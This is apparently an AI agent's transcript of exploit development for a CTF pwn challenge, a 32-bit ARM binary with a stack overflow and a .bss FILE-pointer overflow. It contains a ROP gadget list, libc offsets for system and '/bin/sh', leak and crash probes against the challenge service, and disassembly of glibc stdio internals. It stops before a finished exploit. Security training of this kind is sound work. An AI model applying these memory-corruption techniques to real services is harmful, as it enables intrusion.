# Thread Handoff

- Thread: quiet-packet-1740
- UUID: 6de6b710-808f-4f25-8296-cf5446c007a5
- CTF: midnight-sun-ctf-2026-quals
- Challenge: speed-1
- Runtime: codex
- Model: gpt-5.5
- Status: completed

## Transcript

- **Assistant:** I’ll inspect the challenge files first, then connect to the service once I know what kind of interaction it expects. I’ll keep any webhook updates limited to progress notes, not secret material like the final flag.
- **Assistant:** The challenge ships as a Linux binary with its own loader and libc, so I’m treating this as pwn/reversing rather than a web or crypto service. Next I’m checking architecture, mitigations, and the program’s behavior locally.
- **Assistant:**
  ```
  [*] '/challenge/speed1'
      Arch:     arm-32-little
      RELRO:    Partial RELRO
      Stack:    Canary found
      NX:       NX enabled
      PIE:      No PIE (0x10000)
  ```
- **Assistant:** The target is a 32-bit ARM hard-float ELF, non-PIE with NX and a stack canary. Local execution needs ARM emulation, so I’m switching to static disassembly and libc offset analysis first.
- **Assistant:** The core bug is an unbounded list of decimal integers written into a 64-byte stack buffer. The sentinel `0` stops input but is not stored, and the later summing loop keeps reading words past the buffer until it sees a zero, which gives a numeric leak before the stack canary check.
- **Assistant:**
  ```
  Gadgets information
  ============================================================
  0x00059468 : bx lr
  0x0005dec8 : ldr r8, [sp], #0x20 ; bx lr
  0x0005560c : pop {r0, ip, sp, pc}
  0x000a4058 : pop {r0, r1, fp, ip, lr, pc}
  0x0008c680 : pop {r0, r1, ip, lr, pc}
  0x0001dd70 : pop {r0, r1, ip, sp, pc}
  0x00097710 : pop {r0, r1, pc}
  0x00025cd0 : pop {r0, r1, r2, ip, sp, pc}
  0x00019ab4 : pop {r0, r1, r2, r3, ip, sp, pc}
  0x0001d2d4 : pop {r0, r1, r2, r3, r4, ip, sp, pc}
  0x000a2b8c : pop {r0, r1, r2, r3, r4, r5, ip, sp, pc}
  0x000a2ab0 : pop {r0, r1, r2, r3, r5, ip, sp, pc}
  0x000ae08c : pop {r0, r1, r2, r3, r5, r6, ip, sp, pc}
  0x0001c094 : pop {r0, r1, r2, r4, ip, sp, pc}
  0x0005f838 : pop {r0, r1, r2, r4, r6, ip, sp, pc}
  0x0006fe3c : pop {r0, r1, r2, r4, r6, r8, sl, fp, ip, sp, lr, pc}
  0x0004e54c : pop {r0, r1, r2, r5, ip, sp, pc}
  0x000b6ce0 : pop {r0, r1, r2, r6, ip, sp, pc}
  0x00028208 : pop {r0, r1, r3, ip, sp, pc}
  0x00081338 : pop {r0, r1, r3, r4, ip, sp, pc}
  0x000904f8 : pop {r0, r1, r3, r5, r6, r7, r8, sb, sl, pc}
  0x00025b04 : pop {r0, r1, r3, r6, ip, sp, pc}
  0x0001c7d4 : pop {r0, r1, r4, ip, sp, pc}
  0x00067b24 : pop {r0, r1, r4, r5, ip, sp, pc}
  0x00044844 : pop {r0, r1, r5, ip, sp, pc}
  0x00095e68 : pop {r0, r1, r5, r6, r7, sl, fp, ip, sp, lr, pc}
  0x000171d0 : pop {r0, r2, ip, sp, pc}
  0x00037e08 : pop {r0, r2, r3, ip, sp, pc}
  0x0008fba4 : pop {r0, r2, r3, r4, ip, sp, pc}
  0x0006771c : pop {r0, r2, r3, r4, r5, fp, ip, sp, lr, pc}
  0x000172c4 : pop {r0, r2, r3, r4, r6, r8, sl, fp, ip, sp, lr, pc}
  0x000b483c : pop {r0, r2, r3, r5, ip, sp, pc}
  0x000c41ec : pop {r0, r2, r3, r5, r6, r8, sb, sl, fp, ip, sp, lr, pc}
  0x00080e4c : pop {r0, r2, r3, r6, ip, sp, pc}
  0x000671b0 : pop {r0, r2, r4, ip, sp, pc}
  0x0008d578 : pop {r0, r2, r4, r5, ip, sp, pc}
  0x00088d78 : pop {r0, r2, r4, r6, ip, sp, pc}
  0x00095b94 : pop {r0, r2, r5, ip, sp, pc}
  0x000b9814 : pop {r0, r2, r5, r6, r7, r8, sb, fp, ip, lr, pc}
  0x0009ad04 : pop {r0, r2, r5, sl, fp, ip, sp, lr, pc}
  0x00027e94 : pop {r0, r3, ip, sp, pc}
  0x0001a8d8 : pop {r0, r3, r4, ip, sp, pc}
  0x000233f8 : pop {r0, r3, r4, r5, r6, r7, r8, ip, lr, pc}
  0x000be96c : pop {r0, r3, r5, r6, r7, r8, sb, sl, sp, lr, pc}
  0x00019e2c : pop {r0, r4, ip, sp, pc}
  0x0005919c : pop {r0, r4, pc}
  0x000864c0 : pop {r0, r4, r5, ip, sp, pc}
  0x00051ba0 : pop {r0, r4, r5, r6, r7, r8, ip, lr, pc}
  0x000bed44 : pop {r0, r4, r6, ip, sp, pc}
  0x0005b82c : pop {r0, r5, ip, sp, pc}
  0x0006fe6c : pop {r0, r6, r7, r8, sb, fp, ip, sp, lr, pc}
  0x0001dba0 : pop {r1, ip, sp, pc}
  0x0004d9b8 : pop {r1, r2, ip, sp, pc}
  0x000a5a7c : pop {r1, r2, r3, ip, sp, pc}
  0x00073bc8 : pop {r1, r2, r3, r4, ip, sp, pc}
  0x0004c6f4 : pop {r1, r2, r3, r5, ip, sp, pc}
  0x000aefd8 : pop {r1, r2, r3, r5, r6, r7, r8, ip, lr, pc}
  0x000ad360 : pop {r1, r2, r4, r6, ip, sp, pc}
  0x0007b8f4 : pop {r1, r2, r5, r8, sl, fp, ip, lr, pc}
  0x0008d284 : pop {r1, r3, ip, sp, pc}
  0x00026d0c : pop {r1, r3, r4, r6, r7, r8, ip, lr, pc}
  0x0008c358 : pop {r1, r4, ip, sp, pc}
  0x00024e18 : pop {r1, r5, ip, sp, pc}
  0x000586cc : pop {r1, r6, ip, sp, pc}
  0x0002f16c : pop {r1, r6, r7, r8, sb, sl, sp, lr, pc}
  0x0003208c : pop {r1, r8, sb, fp, pc}
  0x000175f8 : pop {r2, ip, sp, pc}
  0x00055e74 : pop {r2, r3, ip, sp, pc}
  0x0004bf78 : pop {r2, r3, r4, ip, sp, pc}
  0x0005f004 : pop {r2, r4, ip, sp, pc}
  0x00093a50 : pop {r2, r5, r6, ip, sp, pc}
  0x00049770 : pop {r2, sl, fp, pc}
  0x000a34ec : pop {r2, sl, ip, pc}
  0x0004b628 : pop {r3, ip, sp, pc}
  0x0009a744 : pop {r3, r5, ip, sp, pc}
  0x000af440 : pop {r3, r8, sl, fp, ip, sp, pc}
  0x000552d0 : pop {r4, r5, r6, r7, r8, pc}
  0x000b9364 : pop {r4, r5, r6, r7, r8, sb, fp, ip, lr, pc}
  0x00050d24 : pop {r4, r5, r6, r7, sb, ip, sp, pc}
  0x0001e8f0 : pop {r4, r5, r7, r8, fp, ip, sp, pc}
  0x000b0b60 : pop {r4, r6, r7, r8, ip, lr, pc}
  0x0009a3e4 : pop {r4, r8, sl, fp, ip, sp, pc}
  0x0004e2c0 : pop {r5, ip, sp, pc}
  0x000552cc : pop {r5, sb, sl, lr} ; pop {r4, r5, r6, r7, r8, pc}
  0x000ade14 : pop {r6, r7, r8, ip, lr, pc}
  0x0002f0e4 : pop {r6, r7, r8, sb, sl, sp, lr, pc}
  0x0005d98c : pop {r8} ; bx lr

  Unique gadgets found: 87
  ```
- **Assistant:** I found the useful libc offsets: `system` is at `0x2d4cd` and `"/bin/sh"` at `0xd5f2c` in the provided ARM libc. I’m going to query the live service now to see whether connections fork from a stable parent, because that determines whether one leak can be reused for the exploit connection.
- **Assistant:**
  ```
  SEQ 1 [0] ... OUT b' \x1b[1mres:\x1b[0m 0\n'
  SEQ 2 [1, 0] ... OUT b' \x1b[1mres:\x1b[0m 1\n'
  SEQ 17 [1, 1, 1] ... OUT b' \x1b[1mres:\x1b[0m 179313680\n'
  SEQ 18 [1, 1, 1] ... OUT b' \x1b[1mres:\x1b[0m 17\n*** stack smashing detected ***: terminated\n/home/ctf/run.sh: line 2: 1378972 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n'
  ```
- **Assistant:** The service is running the binary under `qemu-arm`. A 16-number input leaks a large sum while preserving the canary; a 17-number input overwrites the canary and aborts, confirming the overflow path.
- **Assistant:**
  ```
  0 b' \x1b[1mres:\x1b[0m 838747920\n'
  1 b' \x1b[1mres:\x1b[0m -1988656624\n'
  2 b' \x1b[1mres:\x1b[0m -1608805616\n'
  3 b' \x1b[1mres:\x1b[0m 268091408\n'
  4 b' \x1b[1mres:\x1b[0m 1580093968\n'
  5 b' \x1b[1mres:\x1b[0m 928853520\n'
  6 b' \x1b[1mres:\x1b[0m 1551538704\n'
  7 b' \x1b[1mres:\x1b[0m -596516336\n'
  ```
- **Assistant:** There is a second bug: each line is read with `fgets` length `0x1024` into a global buffer at `0x22044`, which reaches into nearby `.bss` data such as the copied `stdin` and `stdout` pointers. I’m checking whether that gives a cleaner same-process primitive than trying to reuse a randomized canary across connections.
- **Assistant:** A crashing run can still print `res` before `__stack_chk_fail`. By overwriting the saved frame pointer with a nonzero word, the sum continues one word farther and leaks the saved return address. I’m using that to learn whether libc ASLR is stable enough across runs, even though the canary itself changes each run.
- **Assistant:**
  ```
  16 [510789904, -812360688] ['0x1e720910', '0xcf945c10']
  17 [17, 17] ['0x11', '0x11']
  18 [-948139671, 2119538737] ['0xc77c8969', '0x7e559831']
  19 [1787748507, 2061961603] ['0x6a8ee09b', '0x7ae70983']
  20 [-250386292, 391356564] ['0xf113688c', '0x1753a094']
  21 [2027780945, -211457519] ['0x78dd7b51', '0xf3656a11']
  22 [827691809, -355177735] ['0x31559321', '0xead46af9']
  23 [1763474530, 1196659850] ['0x691c7c62', '0x4753948a']
  24 [1202771691, -523501483] ['0x47b0d6eb', '0xe0cc0055']
  ```
- **Assistant:** Local ARM emulation is not installed in the workspace. I can still use the remote as an oracle, but qemu locally would make the FILE-pointer corruption path much faster to test, so I’m going to try installing the user-mode emulator.
- **Assistant:**
  ```
  Get:6 http://archive.ubuntu.com/ubuntu resolute-backports InRelease [136 kB]
  ```
- **Assistant:**
  ```
  Get:7 http://archive.ubuntu.com/ubuntu resolute/restricted amd64 Packages [189 kB]
  Get:8 http://archive.ubuntu.com/ubuntu resolute/multiverse amd64 Packages [352 kB]
  Get:9 http://archive.ubuntu.com/ubuntu resolute/main amd64 Packages [1874 kB]
  Get:10 http://archive.ubuntu.com/ubuntu resolute/universe amd64 Packages [20.1 MB]
  Get:11 http://archive.ubuntu.com/ubuntu resolute-updates/universe amd64 Packages [44.5 kB]
  Get:12 http://archive.ubuntu.com/ubuntu resolute-updates/main amd64 Packages [78.2 kB]
  Get:13 http://archive.ubuntu.com/ubuntu resolute-updates/restricted amd64 Packages [34.7 kB]
  Fetched 23.3 MB in 5s (4735 kB/s)
  Reading package lists...
  Building dependency tree...
  Reading state information...
  Solving dependencies...
  The following additional packages will be installed:
    qemu-user-binfmt ubuntu-helper-virt-hwe ubuntu-virt
  The following NEW packages will be installed:
    qemu-user qemu-user-binfmt ubuntu-helper-virt-hwe ubuntu-virt
  0 upgraded, 4 newly installed, 0 to remove and 1 not upgraded.
  Need to get 14.8 MB of archives.
  After this operation, 137 MB of additional disk space will be used.
  Get:1 http://archive.ubuntu.com/ubuntu resolute/main amd64 ubuntu-helper-virt-hwe all 1:10.2.1+ds-1ubuntu4 [45.0 kB]
  Get:2 http://archive.ubuntu.com/ubuntu resolute/main amd64 ubuntu-virt amd64 1:10.2.1+ds-1ubuntu3 [40.4 kB]
  Get:3 http://archive.ubuntu.com/ubuntu resolute/universe amd64 qemu-user amd64 1:10.2.1+ds-1ubuntu3 [14.7 MB]
  Get:4 http://archive.ubuntu.com/ubuntu resolute/universe amd64 qemu-user-binfmt amd64 1:10.2.1+ds-1ubuntu3 [1678 B]
  Fetched 14.8 MB in 2s (9245 kB/s)
  Selecting previously unselected package ubuntu-helper-virt-hwe.
  (Reading database ... 73935 files and directories currently installed.)
  Preparing to unpack .../ubuntu-helper-virt-hwe_1%3a10.2.1+ds-1ubuntu4_all.deb ...
  Unpacking ubuntu-helper-virt-hwe (1:10.2.1+ds-1ubuntu4) ...
  Selecting previously unselected package ubuntu-virt.
  Preparing to unpack .../ubuntu-virt_1%3a10.2.1+ds-1ubuntu3_amd64.deb ...
  Unpacking ubuntu-virt (1:10.2.1+ds-1ubuntu3) ...
  Selecting previously unselected package qemu-user.
  Preparing to unpack .../qemu-user_1%3a10.2.1+ds-1ubuntu3_amd64.deb ...
  Unpacking qemu-user (1:10.2.1+ds-1ubuntu3) ...
  Selecting previously unselected package qemu-user-binfmt.
  Preparing to unpack .../qemu-user-binfmt_1%3a10.2.1+ds-1ubuntu3_amd64.deb ...
  Unpacking qemu-user-binfmt (1:10.2.1+ds-1ubuntu3) ...
  Setting up ubuntu-helper-virt-hwe (1:10.2.1+ds-1ubuntu4) ...
  Setting up ubuntu-virt (1:10.2.1+ds-1ubuntu3) ...
  Setting up qemu-user (1:10.2.1+ds-1ubuntu3) ...
  Setting up qemu-user-binfmt (1:10.2.1+ds-1ubuntu3) ...
  Processing triggers for systemd (259.5-0ubuntu3) ...
  ```
- **Assistant:**
  ```
  Building dependency tree...
  Reading state information...
  Solving dependencies...
  The following NEW packages will be installed:
    gdb-multiarch
  0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
  Need to get 7655 kB of archives.
  After this operation, 38.2 MB of additional disk space will be used.
  Get:1 http://archive.ubuntu.com/ubuntu resolute/universe amd64 gdb-multiarch amd64 17.1-2ubuntu1 [7655 kB]
  Fetched 7655 kB in 1s (8087 kB/s)
  Selecting previously unselected package gdb-multiarch.
  (Reading database ... 74099 files and directories currently installed.)
  Preparing to unpack .../gdb-multiarch_17.1-2ubuntu1_amd64.deb ...
  Unpacking gdb-multiarch (17.1-2ubuntu1) ...
  Setting up gdb-multiarch (17.1-2ubuntu1) ...
  ```
- **Assistant:** With local qemu installed, I can now reproduce crashes from the `.data` overflow. The path that avoids the stack canary is to make the first line start with `0`, overflow the copied `stdout` pointer, and let the final `printf` operate on controlled data. I’m debugging the crash point to turn that into a controlled call instead of a segfault.
- **Assistant:**
  ```
  [ANSI banner art omitted]
  num: qemu-arm: QEMU: Terminated via GDBstub
  ```
- **Assistant:**
  ```
  [ANSI banner art omitted]
  num: qemu-arm: QEMU: Terminated via GDBstub
  ```
- **Assistant:**
  ```
  0x00033280      3867           str r0, [r7, 0x70]
  0x00033282      3060           str r0, [r6]
  0x00033284      35d4           bmi 0x332f2
  0x00033286      794b           ldr r3, [0x0003346c]        ; [0x3346c:4]=0xc41c0
  0x00033288      7b44           add r3, pc
  0x0003328a      1b68           ldr r3, [r3]
  0x0003328c      fb66           str r3, [r7, 0x6c]
  0x0003328e      002b           cmp r3, 0
  0x00033290      00f08a86       beq.w 0x33fa8
  0x00033294      764d           ldr r5, [0x00033470]        ; [0x33470:4]=200
  0x00033296      5246           mov r2, sl
  0x00033298      764b           ldr r3, [0x00033474]        ; [0x33474:4]=0xc40d0
  0x0003329a      07f19800       add.w r0, r7, 0x98
  0x0003329e      7649           ldr r1, [0x00033478]        ; [0x33478:4]=368
  0x000332a0      59f80550       ldr.w r5, [sb, r5]
  0x000332a4      7b44           add r3, pc
  0x000332a6      d3f8b430       ldr.w r3, [r3, 0xb4]
  0x000332aa      2d68           ldr r5, [r5]
  0x000332ac      59f80110       ldr.w r1, [sb, r1]
  0x000332b0      6b40           eors r3, r5
  0x000332b2      9847           blx r3
  0x000332b4      daf80030       ldr.w r3, [sl]
  0x000332b8      1b04           lsls r3, r3, 0x10
  0x000332ba      1ad4           bmi 0x332f2
  0x000332bc      daf84800       ldr.w r0, [sl, 0x48]
  0x000332c0      7b6f           ldr r3, [r7, 0x74]
  0x000332c2      a3f59865       sub.w r5, r3, 0x4c0
  0x000332c6      8368           ldr r3, [r0, 8]
  0x000332c8      ab42           cmp r3, r5
  0x000332ca      0fd0           beq 0x332ec
  0x000332cc      0123           movs r3, 1
  0x000332ce      50e8002f       ldrex r2, [r0]
  0x000332d2      002a           cmp r2, 0
  0x000332d4      05d1           bne 0x332e2
  0x000332d6      40e80031       strex r1, r3, [r0]
  0x000332da      0029           cmp r1, 0
  0x000332dc      f7d1           bne 0x332ce
  0x000332de      bff35b8f       dmb ish
  0x000332e2      40f0b980       bne.w 0x33458
  0x000332e6      daf84800       ldr.w r0, [sl, 0x48]
  ```
- **Assistant:**
  ```
  0x3b700807 base? 0x3b6e9000 out 997197849
  0xf1809c1f base? 0xf17f2000 out -243229647
  0x969ffc17 base? 0x969e8000 out -1767900119
  0x92c41c1f base? 0x92c2a000 out -1832641487
  0xdd94980f base? 0xdd932000 out -577464287
  ```
- **Assistant:**
  ```
  [ANSI banner art omitted]
  num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: res: 1569938585
  *** stack smashing detected ***: terminated
  qemu-arm: QEMU: Terminated via GDBstub
  ```
- **Assistant:**
  ```
  [ANSI banner art omitted]
  num: num: qemu-arm: QEMU: Terminated via GDBstub
  ```
- **Assistant:**
  ```
  [ANSI banner art omitted]
  num: qemu-arm: QEMU: Terminated via GDBstub
  ```
- **Assistant:**
  ```
  [ANSI banner art omitted]
  num: Fatal error: glibc detected an invalid stdio handle
  qemu-arm: QEMU: Terminated via GDBstub
  ```
- **Assistant:**
  ```
  - offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
  0x000f2800  49ed 0400 b101 0500 61e4 0400 b502 0500  I.......a.......
  0x000f2810  ddde 0400 d1dd 0400 3d60 0400 39ed 0400  ........=`..9...
  0x000f2820  5de9 0400 05e2 0400 b176 0400 51e9 0400  ]........v..Q...
  0x000f2830  cd0d 0500 d50d 0500 0000 0000 0000 0000  ................
  0x000f2840  f1a0 0400 e593 0400 219e 0400 6d98 0400  ........!...m...
  0x000f2850  d9a0 0400 f998 0400 019c 0400 89a1 0400  ................
  0x000f2860  b502 0500 1502 0500 4104 0500 c199 0400  ........A.......
  0x000f2870  c10d 0500 c90d 0500 ad0d 0500 4104 0500  ............A...
  0x000f2880  b90d 0500 cd0d 0500 d50d 0500 0000 0000  ................
  0x000f2890  0000 0000 f1a0 0400 5d9e 0400 219e 0400  ........]...!...
  0x000f28a0  6d98 0400 d9a0 0400 f998 0400 019c 0400  m...............
  0x000f28b0  89a1 0400 b502 0500 1502 0500 4104 0500  ............A...
  0x000f28c0  c199 0400 c10d 0500 c90d 0500 ad0d 0500  ................
  0x000f28d0  4104 0500 b90d 0500 cd0d 0500 d50d 0500  A...............
  0x000f28e0  0000 0000 0000 0000 cdef 0400 0db2 0400  ................
  0x000f28f0  b1af 0400 6d98 0400 4d97 0400 a1b4 0400  ....m...M.......
  0x000f2900  81ea 0400 d9a8 0400 b502 0500 f9de 0400  ................
  0x000f2910  a9b3 0400 f96f 0400 39ed 0400 5de9 0400  .....o..9...]...
  0x000f2920  05e2 0400 d5de 0400 51e9 0400 cd0d 0500  ........Q.......
  0x000f2930  d50d 0500 0000 0000 0000 0000 cdef 0400  ................
  0x000f2940  0db2 0400 d1af 0400 6d98 0400 4d97 0400  ........m...M...
  0x000f2950  a1b4 0400 81ea 0400 d9a8 0400 b502 0500  ................
  0x000f2960  f9de 0400 a9b3 0400 f96f 0400 39ed 0400  .........o..9...
  0x000f2970  5de9 0400 05e2 0400 09e0 0400 51e9 0400  ]...........Q...
  0x000f2980  cd0d 0500 d50d 0500 0000 0000 0000 0000  ................
  0x000f2990  cdef 0400 0db2 0400 41a4 0400 6d98 0400  ........A...m...
  0x000f29a0  4d97 0400 a1b4 0400 81ea 0400 d9a8 0400  M...............
  0x000f29b0  b502 0500 ddde 0400 a9b3 0400 f96f 0400  .............o..
  0x000f29c0  39ed 0400 5de9 0400 05e2 0400 d5de 0400  9...]...........
  0x000f29d0  51e9 0400 cd0d 0500 d50d 0500 0000 0000  Q...............
  0x000f29e0  0000 0000 b9ba 0400 5d9e 0400 219e 0400  ........]...!...
  0x000f29f0  6d98 0400 d9a0 0400 f998 0400 019c 0400  m...............
  0x000f2a00  89a1 0400 b502 0500 1502 0500 81ba 0400  ................
  0x000f2a10  c199 0400 c10d 0500 c90d 0500 ad0d 0500  ................
  0x000f2a20  4104 0500 b90d 0500 cd0d 0500 d50d 0500  A...............
  0x000f2a30  0000 0000 0000 0000 7dc3 0400 d10e 0500  ........}.......
  0x000f2a40  950e 0500 9d00 0500 1111 0500 d900 0500  ................
  0x000f2a50  b101 0500 d111 0500 b502 0500 1502 0500  ................
  0x000f2a60  4dc3 0400 f902 0500 c10d 0500 c90d 0500  M...............
  0x000f2a70  ad0d 0500 4104 0500 b90d 0500 cd0d 0500  ....A...........
  0x000f2a80  d50d 0500 0000 0000 0000 0000 2911 0500  ............)...
  0x000f2a90  69c8 0400 950e 0500 9d00 0500 1111 0500  i...............
  0x000f2aa0  d900 0500 b101 0500 d111 0500 b502 0500  ................
  0x000f2ab0  1502 0500 4104 0500 f902 0500 c10d 0500  ....A...........
  0x000f2ac0  c90d 0500 ad0d 0500 4104 0500 b90d 0500  ........A.......
  0x000f2ad0  cd0d 0500 d50d 0500 0000 0000 0000 0000  ................
  0x000f2ae0  0000 0000 8dc9 0400 0000 0000 0000 0000  ................
  0x000f2af0  0000 0000 35c9 0400 0000 0000 0000 0000  ....5...........
  0x000f2b00  0000 0000 0000 0000 0000 0000 0000 0000  ................
  0x000f2b10  0000 0000 0000 0000 0000 0000 0000 0000  ................
  0x000f2b20  0000 0000 0000 0000 0000 0000 0000 0000  ................
  0x000f2b30  0000 0000 cdef 0400 fdf6 0400 e9f4 0400  ................
  0x000f2b40  9d00 0500 050d 0500 49ed 0400 81ea 0400  ........I.......
  0x000f2b50  61e4 0400 b502 0500 ddde 0400 d1dd 0400  a...............
  0x000f2b60  3d60 0400 39ed 0400 5de9 0400 05e2 0400  =`..9...].......
  0x000f2b70  d5de 0400 51e9 0400 cd0d 0500 d50d 0500  ....Q...........
  0x000f2b80  0000 0000 0000 0000 cdef 0400 fdf6 0400  ................
  0x000f2b90  ddec 0400 9d00 0500 050d 0500 49ed 0400  ............I...
  0x000f2ba0  c9e9 0400 e5eb 0400 b502 0500 f9de 0400  ................
  0x000f2bb0  0de2 0400 3d60 0400 39ed 0400 5de9 0400  ....=`..9...]...
  0x000f2bc0  05e2 0400 09e0 0400 51e9 0400 cd0d 0500  ........Q.......
  0x000f2bd0  d50d 0500 0000 0000 0000 0000 cdef 0400  ................
  0x000f2be0  fdf6 0400 e5e3 0400 9d00 0500 050d 0500  ................
  0x000f2bf0  49ed 0400 21e4 0400 81de 0400 b502 0500  I...!...........
  0x000f2c00  f9de 0400 d1dd 0400 3d60 0400 39ed 0400  ........=`..9...
  0x000f2c10  5de9 0400 05e2 0400 d5de 0400 51e9 0400  ]...........Q...
  0x000f2c20  cd0d 0500 d50d 0500 0000 0000 0000 0000  ................
  0x000f2c30  2911 0500 d10e 0500 950e 0500 9d00 0500  )...............
  0x000f2c40  1111 0500 d900 0500 b101 0500 d111 0500  ................
  0x000f2c50  b502 0500 1502 0500 4104 0500 f902 0500  ........A.......
  0x000f2c60  c10d 0500 c90d 0500 ad0d 0500 4104 0500  ............A...
  0x000f2c70  b90d 0500 cd0d 0500 d50d 0500 0000 0000  ................
  0x000f2c80  0000 0000 2911 0500 312a 0a00 950e 0500  ....)...1*......
  0x000f2c90  9d00 0500 1111 0500 d900 0500 b101 0500  ................
  0x000f2ca0  d111 0500 b502 0500 1502 0500 4104 0500  ............A...
  0x000f2cb0  f902 0500 c10d 0500 c90d 0500 ad0d 0500  ................
  0x000f2cc0  4104 0500 b90d 0500 cd0d 0500 d50d 0500  A...............
  0x000f2cd0  d02c 0f00 fc4e 0c00 2c4e 0c00 b04b 0c00  .,...N..,N...K..
  0x000f2ce0  5450 0c00 444e 0c00 9c4b 0c00 0000 0000  TP..DN...K......
  0x000f2cf0  904b 0c00 744b 0c00 404b 0c00 9c4b 0c00  .K..tK..@K...K..
  ```
- **Assistant:**
  ```
  ERROR: Cannot find function at 0x00050ed1
  ```
- **Assistant:**
  ```
  ; CALL XREF from sym.getchar @ +0x12e(x)
  238: sym._IO_str_overflow (int16_t arg1, uint32_t arg2);
  `- args(r0, r1)
  0x00050ed0      0268           ldr r2, [r0]                ; arg1
  0x00050ed2      1307           lsls r3, r2, 0x1c
  0x00050ed4      04d5           bpl 0x50ee0
  0x00050ed6      481c           adds r0, r1, 1              ; arg2
  0x00050ed8      18bf           it ne
  0x00050eda      4ff0ff30       mov.w r0, -1
  0x00050ede      7047           bx lr
  ; CODE XREF from sym._IO_str_overflow @ 0x50ed4(x)
  0x00050ee0      02f44063       and r3, r2, 0xc00
  0x00050ee4      b3f5806f       cmp.w r3, 0x400
  0x00050ee8      2de9f047       push.w {r4, r5, r6, r7, r8, sb, sl, lr}
  0x00050eec      04bf           itt eq
  0x00050eee      42f40062       orreq r2, r2, 0x800
  0x00050ef2      4368           ldr r3, [r0, 4]             ; arg1
  0x00050ef4      0d46           mov r5, r1                  ; arg2
  0x00050ef6      08bf           it eq
  ; DATA XREF from sym.gethostbyname_r @ 0xa5740(r)
  0x00050ef8      8468           ldr r4, [r0, 8]             ; arg1
  0x00050efa      d0e90776       ldrd r7, r6, [r0, 0x1c]     ; arg1
  0x00050efe      14bf           ite ne
  0x00050f00      4369           ldreq r3, [r0, 0x14]        ; arg1
  0x00050f02      0260           str r2, [r0]                ; arg1
  0x00050f04      a6eb0706       sub.w r6, r6, r7
  0x00050f08      0269           ldr r2, [r0, 0x10]          ; arg1
  0x00050f0a      08bf           it eq
  0x00050f0c      4460           str r4, [r0, 4]             ; arg1
  0x00050f0e      0446           mov r4, r0                  ; arg1
  ; DATA XREF from sym._IO_flush_all_linebuffered @ +0x1fc(r)
  0x00050f10      08bf           it eq
  0x00050f12      4361           str r3, [r0, 0x14]          ; arg1
  0x00050f14      9a1a           subs r2, r3, r2
  0x00050f16      b1f1ff3f       cmp.w r1, -1                ; arg2
  0x00050f1a      14bf           ite ne
  0x00050f1c      3146           moveq r1, r6
  0x00050f1e      711c           adds r1, r6, 1
  0x00050f20      9142           cmp r1, r2
  0x00050f22      3cd8           bhi 0x50f9e
  0x00050f24      0368           ldr r3, [r0]                ; arg1
  0x00050f26      13f0010a       ands sl, r3, 1
  ; DATA XREF from fcn.00088ca0 @ 0x88d02(r)
  0x00050f2a      45d1           bne 0x50fb8
  0x00050f2c      06f13209       add.w sb, r6, 0x32
  0x00050f30      4fea4909       lsl.w sb, sb, 1
  0x00050f34      4e45           cmp r6, sb
  0x00050f36      3fd8           bhi 0x50fb8
  0x00050f38      d0f8a030       ldr.w r3, [r0, 0xa0]        ; arg1
  0x00050f3c      4846           mov r0, sb
  0x00050f3e      9847           blx r3
  0x00050f40      8046           mov r8, r0
  0x00050f42      0028           cmp r0, 0
  ; DATA XREF from sym._IO_flush_all_linebuffered @ +0x1f8(r)
  0x00050f44      38d0           beq 0x50fb8
  0x00050f46      4fb1           cbz r7, 0x50f5c
  0x00050f48      3246           mov r2, r6
  0x00050f4a      3946           mov r1, r7
  0x00050f4c      c5f7f8ee       blx fcn.00016d40
  0x00050f50      d4f8a430       ldr.w r3, [r4, 0xa4]
  0x00050f54      3846           mov r0, r7
  0x00050f56      9847           blx r3
  0x00050f58      c4f81ca0       str.w sl, [r4, 0x1c]
  ; CODE XREF from sym._IO_str_overflow @ 0x50f46(x)
  0x00050f5c      a9eb0602       sub.w r2, sb, r6            ; size_t n
  0x00050f60      08eb0600       add.w r0, r8, r6            ; void *s
  0x00050f64      0021           movs r1, 0                  ; int c
  0x00050f66      08f044ea       blx sym.memset              ; void *memset(void *s, int c, size_t n)
  0x00050f6a      08eb0902       add.w r2, r8, sb            ; int16_t arg3
  0x00050f6e      0123           movs r3, 1                  ; int16_t arg4
  0x00050f70      4146           mov r1, r8                  ; int16_t arg2
  0x00050f72      2046           mov r0, r4                  ; int16_t arg1
  0x00050f74      fff734f8       bl sym._IO_setb
  0x00050f78      211d           adds r1, r4, 4
  0x00050f7a      0ec9           ldm r1, {r1, r2, r3}
  0x00050f7c      c4f81080       str.w r8, [r4, 0x10]
  0x00050f80      de1b           subs r6, r3, r7
  0x00050f82      c81b           subs r0, r1, r7
  0x00050f84      6369           ldr r3, [r4, 0x14]
  0x00050f86      d21b           subs r2, r2, r7
  0x00050f88      216a           ldr r1, [r4, 0x20]
  0x00050f8a      4644           add r6, r8
  0x00050f8c      db1b           subs r3, r3, r7
  0x00050f8e      4044           add r0, r8
  0x00050f90      4244           add r2, r8
  0x00050f92      4344           add r3, r8
  0x00050f94      e660           str r6, [r4, 0xc]
  0x00050f96      6060           str r0, [r4, 4]
  0x00050f98      a260           str r2, [r4, 8]
  0x00050f9a      c4e90531       strd r3, r1, [r4, 0x14]
  ; CODE XREF from sym._IO_str_overflow @ 0x50f22(x)
  0x00050f9e      6a1c           adds r2, r5, 1
  0x00050fa0      2846           mov r0, r5
  0x00050fa2      1fbf           itttt ne
  0x00050fa4      5a1c           addne r2, r3, 1
  0x00050fa6      6261           strne r2, [r4, 0x14]
  0x00050fa8      1d70           strb r5, [r3]
  0x00050faa      6369           ldr r3, [r4, 0x14]
  0x00050fac      a268           ldr r2, [r4, 8]
  0x00050fae      9a42           cmp r2, r3
  0x00050fb0      38bf           it lo
  0x00050fb2      a360           str r3, [r4, 8]
  ; CODE XREF from sym._IO_str_overflow @ 0x50fbc(x)
  0x00050fb4      bde8f087       pop.w {r4, r5, r6, r7, r8, sb, sl, pc}
  ; CODE XREFS from sym._IO_str_overflow @ 0x50f2a(x), 0x50f36(x), 0x50f44(x)
  0x00050fb8      4ff0ff30       mov.w r0, -1
  ; DATA XREF from sym._IO_list_lock @ 0x50df8(r)
  0x00050fbc      fae7           b 0x50fb4
  0x00050fbe      00bf           nop
  ; CALL XREFS from sym._IO_str_seekoff @ 0x51354(x), 0x5139c(x)
  322: fcn.00050fc0 (int16_t arg1, uint32_t arg2, int16_t arg3, int16_t arg4, int16_t c);
